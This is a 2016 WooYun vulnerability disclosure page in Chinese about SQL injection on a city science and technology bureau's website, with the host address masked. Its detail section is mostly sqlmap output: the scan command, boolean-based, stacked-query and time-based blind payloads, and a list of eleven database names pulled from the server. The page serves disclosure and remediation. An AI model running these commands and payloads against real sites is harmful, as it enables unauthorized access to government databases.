当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169445

漏洞标题:某市科技局一处Sql注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 小胖博客

提交时间:2016-01-18 14:51

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

RT

详细说明:

[root@Hacker~]# Sqlmap -u http://**.**.**.**/kjxxw.php?id=113550 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 19:04:40
[19:04:40] [INFO] resuming back-end DBMS 'microsoft sql server'
[19:04:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=113550 AND 5531=5531
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=113550; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=113550 WAITFOR DELAY '0:0:5'--
---
[19:04:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.6
back-end DBMS: Microsoft SQL Server 2008
[19:04:41] [INFO] fetching database names
[19:04:41] [INFO] fetching number of databases
[19:04:41] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[19:04:41] [INFO] retrieved: 11
[19:04:44] [INFO] retrieved: infosite
[19:05:07] [INFO] retrieved: master
[19:05:25] [INFO] retrieved: model
[19:05:43] [INFO] retrieved: msdb
[19:05:57] [INFO] retrieved: Portal
[19:06:14] [INFO] retrieved: ReportServer
[19:06:48] [INFO] retrieved: ReportServerTempDB
[19:07:38] [INFO] retrieved: SSODatabase_DLKJ
[19:08:23] [INFO] retrieved: tempdb
[19:08:41] [INFO] retrieved: ZhiShiJu
[19:09:05] [INFO] retrieved: ZhuanLi
available databases [11]:
[*] infosite
[*] master
[*] model
[*] msdb
[*] Portal
[*] ReportServer
[*] ReportServerTempDB
[*] SSODatabase_DLKJ
[*] tempdb
[*] ZhiShiJu
[*] ZhuanLi

漏洞证明:

available databases [11]:
[*] infosite
[*] master
[*] model
[*] msdb
[*] Portal
[*] ReportServer
[*] ReportServerTempDB
[*] SSODatabase_DLKJ
[*] tempdb
[*] ZhiShiJu
[*] ZhuanLi

)07D9U_8V5[OHGV2H@`6Q$K.png


跑的太慢了,我这人向来没有耐心。
不过在上面看到了专利二字,就知道没那么简单。

修复方案:

加强过滤

版权声明:转载请注明来源 小胖博客@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-01-20 15:13

厂商回复:

漏洞重复,CNVD不在重复处置。

最新状态:

暂无